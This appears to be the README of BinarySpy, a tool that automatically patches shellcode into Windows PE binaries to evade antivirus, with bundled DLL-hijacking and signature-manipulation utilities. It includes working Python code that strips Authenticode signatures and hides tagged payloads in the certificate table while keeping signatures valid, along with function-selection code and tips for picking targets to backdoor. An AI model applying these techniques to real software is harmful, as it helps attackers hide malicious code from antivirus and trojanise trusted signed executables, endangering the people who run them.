A tool that automatically patches shellcode into a binary file to bypass AV.
- Two Fuzz Modes
  - Auto Analysis: CFG + Call Chain + Symbolic Execution verification
  - Fuzz All: Test all large functions directly
- Smart Function Filtering - Filter candidate functions by call depth, function size, and symbolic-execution reachability
- Symbolic Execution Verification - Verify that candidate functions are actually reachable from the entry point
- Digital Signature Removal - Remove the PE Authenticode signature (certificate table), with an automatic backup of the original file
- Modern Dark Theme UI - Multiple theme options built on ttkbootstrap
- Multi-language Support - Chinese/English interface
- Cache System - Speed up repeated analysis of the same binary
ZeroEye is an automated DLL hijacking scanner that supports native PE files, .NET programs, and kernel drivers.
Features:
- Native PE Scan: Scan the import table, auto-copy non-system DLLs, generate proxy DLL templates
- .NET Scan: Detect config hijack, P/Invoke, and assembly side-loading vectors
- Kernel Driver Scan: Scan IOCTL handlers and dangerous APIs (Microsoft-signed drivers are skipped)
- C++ Class Rebuild: Rebuild C++ classes from MSVC decorated names and generate 3 proxy templates
Usage: Click the ZeroEye button in the main window to open the tool.
SigFlip is a signature manipulation tool that uses the certificate table padding technique: the Authenticode hash does not cover the PE's certificate table, so bytes can be added there without invalidating the signature.
Features:
- Bit Flip: Add random padding to change the PE file hash without breaking the signature
- Inject: Embed custom data into the certificate area, marked with a BinarySpy magic tag
- Extract: Extract embedded data from modified PE files
Usage: Click the SigFlip button in the main window to open the tool.
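As an added example (not code from BinarySpy or SigFlip), the script below shows the certificate-table mechanics behind both the Digital Signature Removal feature and SigFlip's Inject/Extract, using only the Python standard library on a constructed minimal PE32+ image. The `BinarySpy\0` marker, the function names and the `.bak` backup suffix are assumptions made for this illustration.

```python
# Added example, not the project's own code. Works on a synthetic PE built
# by build_test_pe(); the real tool operates on arbitrary signed binaries.
import os
import shutil
import struct
import tempfile

SECURITY_DIR_INDEX = 4        # IMAGE_DIRECTORY_ENTRY_SECURITY
MAGIC_TAG = b"BinarySpy\x00"  # assumed marker, chosen for this demo only


def _security_dir_offset(pe: bytes) -> int:
    """File offset of the security data-directory entry (VirtualAddress, Size)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20                       # skip PE signature + COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                            # PE32: directories at +96
        dd_base = opt + 96
    elif magic == 0x20B:                          # PE32+: directories at +112
        dd_base = opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return dd_base + SECURITY_DIR_INDEX * 8


def security_dir(pe: bytes) -> tuple:
    """(file offset, size) of the certificate table, (0, 0) if unsigned.
    Unlike other directories, this entry holds a raw file offset, not an RVA."""
    return struct.unpack_from("<II", pe, _security_dir_offset(pe))


def strip_signature(pe: bytes) -> bytes:
    """Zero the security directory and truncate a trailing certificate table."""
    off = _security_dir_offset(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, off)
    out = bytearray(pe)
    struct.pack_into("<II", out, off, 0, 0)
    if cert_size and cert_off + cert_size == len(pe):
        del out[cert_off:]                        # table sits at EOF: drop it
    return bytes(out)


def strip_signature_file(path: str) -> str:
    """Copy `path` to `path + '.bak'` first, then strip in place; return backup path."""
    backup = path + ".bak"
    shutil.copy2(path, backup)
    with open(path, "rb") as fh:
        pe = fh.read()
    with open(path, "wb") as fh:
        fh.write(strip_signature(pe))
    return backup


def inject(pe: bytes, payload: bytes) -> bytes:
    """Append a tagged payload inside the certificate table. Authenticode hashes
    neither this directory entry nor the table, so the signature still
    verifies while the file's SHA-256 changes."""
    off = _security_dir_offset(pe)
    cert_off, cert_size = struct.unpack_from("<II", pe, off)
    if cert_size == 0:
        raise ValueError("unsigned PE: no certificate table to hide data in")
    if cert_off + cert_size != len(pe):
        raise ValueError("certificate table is not at end of file")
    blob = MAGIC_TAG + struct.pack("<I", len(payload)) + payload
    blob += b"\0" * (-len(blob) % 8)              # WIN_CERTIFICATE is 8-byte aligned
    out = bytearray(pe)
    dw_length = struct.unpack_from("<I", out, cert_off)[0]
    struct.pack_into("<I", out, cert_off, dw_length + len(blob))        # grow entry
    struct.pack_into("<II", out, off, cert_off, cert_size + len(blob))  # grow directory
    return bytes(out + blob)


def extract(pe: bytes):
    """Recover the payload hidden by inject(); None when no tag is present."""
    cert_off, cert_size = security_dir(pe)
    table = pe[cert_off:cert_off + cert_size]
    idx = table.rfind(MAGIC_TAG)
    if idx < 0:
        return None
    start = idx + len(MAGIC_TAG)
    (n,) = struct.unpack_from("<I", table, start)
    return bytes(table[start + 4:start + 4 + n])


def build_test_pe(cert_body: bytes = b"\x30\x82fake-pkcs7") -> bytes:
    """Constructed minimal PE32+ (no sections) carrying one certificate entry."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)  # x64, 240-byte opt hdr
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                          # PE32+ magic
    body = b"\xCC" * 16
    cert_off = 64 + 4 + 20 + 240 + len(body)                       # 344, 8-byte aligned
    cert = bytearray(struct.pack("<IHH", 0, 0x0200, 0x0002) + cert_body)  # rev 2.0, PKCS#7
    cert += b"\0" * (-len(cert) % 8)
    struct.pack_into("<I", cert, 0, len(cert))                     # dwLength
    struct.pack_into("<II", opt, 112 + SECURITY_DIR_INDEX * 8, cert_off, len(cert))
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + body + bytes(cert)


def demo_strip_file() -> tuple:
    """Round trip through disk: returns (backup's security dir, stripped file's dir)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "target.exe")
        with open(path, "wb") as fh:
            fh.write(build_test_pe())
        backup = strip_signature_file(path)
        with open(backup, "rb") as fh:
            bak_dir = security_dir(fh.read())
        with open(path, "rb") as fh:
            new_dir = security_dir(fh.read())
    return bak_dir, new_dir


if __name__ == "__main__":
    pe = build_test_pe()
    print("security dir:", security_dir(pe))
    print("hidden payload:", extract(inject(pe, b"hello")))
    print("backup vs stripped:", demo_strip_file())
```

Two caveats worth knowing before relying on either operation: stripping the table does not recompute the optional header's CheckSum field, which Authenticode ignores but some loaders of drivers and services do check; and on Windows hosts that have opted into the MS13-098 / CVE-2013-3900 hardening (`EnableCertPaddingCheck`), WinVerifyTrust rejects signatures whose WIN_CERTIFICATE structure carries extra bytes, so the inject technique no longer keeps the signature valid there.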
```
pip install pefile angr psutil ttkbootstrap
```
- Select the target PE file
- Select the patch source (or use the built-in test patch)
- Choose a Fuzz mode:
  - Auto Analysis: Recommended for most cases
  - Fuzz All: Brute-force all large functions
- Configure parameters:
  - Test Delay: Time to wait for the process to spawn
  - Monitor Process: Process name to detect (e.g., calc.exe)
  - Max Call Depth: Filter functions by call depth
  - Min Function Size: Minimum function size to test
  - Symbolic Execution Steps: Only when symbolic execution is enabled
- Click Start Fuzz
| Feature | Auto Analysis | Fuzz All |
|---|---|---|
| CFG Analysis | Full | Basic |
| Call Chain Tracking | Yes | No |
| Symbolic Execution | Optional | No |
| Call Depth Filter | Yes | No |
| Function Size Filter | Yes | Yes |
| Speed | Slower | Faster |
| Parameter | Description |
|---|---|
| Test Delay | Seconds to wait before checking whether the target process has spawned |
| Monitor Process | Process name(s) to monitor, comma separated (e.g., calc.exe,CalculatorApp.exe) |
| Max Call Depth | Only test functions within this many calls of the entry point |
| Min Function Size | Only test functions at least this large |
| Sym Exec Steps | Maximum number of steps for symbolic execution verification |
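The depth and size filters from the tables above, applied to a call graph, as an added example rather than BinarySpy's own code. The graph is a plain `{caller: [callees]}` dict plus a `{address: size}` dict; `load_from_angr` shows how such dicts would be built with angr (its function names are taken from angr's public API as I understand it and are not exercised here), and the sample graph is constructed for the demo.

```python
# Added example, not the project's own code.
from collections import deque


def reachable_depths(callgraph: dict, entry: int) -> dict:
    """BFS from the entry point; map every reachable function to its call depth."""
    depth = {entry: 0}
    queue = deque([entry])
    while queue:
        caller = queue.popleft()
        for callee in callgraph.get(caller, ()):
            if callee not in depth:
                depth[callee] = depth[caller] + 1
                queue.append(callee)
    return depth


def select_candidates(callgraph: dict, sizes: dict, entry: int,
                      max_depth: int = 3, min_size: int = 64) -> list:
    """Auto Analysis selection: functions within max_depth calls of entry and at
    least min_size bytes, ordered shallowest first, then largest first.
    Returns [(address, depth, size)]. This is static reachability only: an edge
    exists in the graph but the path may never execute, which is what the
    optional symbolic-execution step checks afterwards."""
    depth = reachable_depths(callgraph, entry)
    ranked = sorted((d, -sizes.get(a, 0), a) for a, d in depth.items()
                    if 0 < d <= max_depth and sizes.get(a, 0) >= min_size)
    return [(a, d, -neg) for d, neg, a in ranked]


def fuzz_all(sizes: dict, min_size: int = 64) -> list:
    """Fuzz All selection: every function above min_size, largest first,
    with no reachability check at all."""
    return sorted((a for a, s in sizes.items() if s >= min_size),
                  key=lambda a: -sizes[a])


def load_from_angr(path: str):
    """Derive (callgraph, sizes, entry) from angr's CFGFast. API names are an
    assumption about angr; imported lazily so the rest of the file runs without it."""
    import angr
    proj = angr.Project(path, auto_load_libs=False)
    cfg = proj.analyses.CFGFast(normalize=True)
    g = cfg.functions.callgraph                 # networkx DiGraph keyed by address
    callgraph = {a: list(g.successors(a)) for a in g.nodes}
    sizes = {f.addr: f.size for f in cfg.functions.values()}
    return callgraph, sizes, proj.entry


# Constructed sample: entry -> CRT start -> main -> workers, plus one dead function.
SAMPLE_GRAPH = {
    0x401000: [0x401100],            # _start -> __scrt_common_main
    0x401100: [0x401200],            # -> main
    0x401200: [0x401300, 0x401400],  # main -> parse_args, process_file
    0x401400: [0x401500],            # process_file -> render
    0x401500: [0x401600],            # render -> flush (depth 5)
}
SAMPLE_SIZES = {
    0x401000: 32, 0x401100: 200, 0x401200: 150, 0x401300: 40,
    0x401400: 512, 0x401500: 300, 0x401600: 900,
    0x402000: 4096,                  # large, but never called from entry
}

if __name__ == "__main__":
    for addr, d, size in select_candidates(SAMPLE_GRAPH, SAMPLE_SIZES, 0x401000):
        print(f"auto  0x{addr:x} depth={d} size={size}")
    for addr in fuzz_all(SAMPLE_SIZES):
        print(f"all   0x{addr:x} size={SAMPLE_SIZES[addr]}")
```

Comparing the two outputs shows why Auto Analysis is slower but better targeted: the dead 0x402000 function heads the Fuzz All list by size alone, while the depth filter never considers it, and raising Max Call Depth to 5 pulls in the deeper render/flush pair without changing the ranking of the shallow hits.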
Available dark themes:
- cyborg - Dark gray/cyan (default)
- darkly - Dark blue/white
- vapor - Dark purple/pink
- superhero - Dark gray/orange
- pulse - Dark gray/blue
- Use larger PE files as targets (more candidate functions to patch)
- Prefer PE files with the GUI subsystem (no console window)
- Keep the shellcode small for better results
- For custom shellcode, use CppDevShellcode
```
Entry Point → CRT → Main → Target Functions
        ↓
  CFG Analysis
        ↓
  Call Chain Tracking
        ↓
  Symbolic Execution (optional)
        ↓
  Fuzz Testing
        ↓
  Success Detection
```
This project is for educational and authorized security testing purposes only. Users are responsible for ensuring compliance with applicable laws and regulations. The author assumes no liability for any misuse or damage caused by this tool.


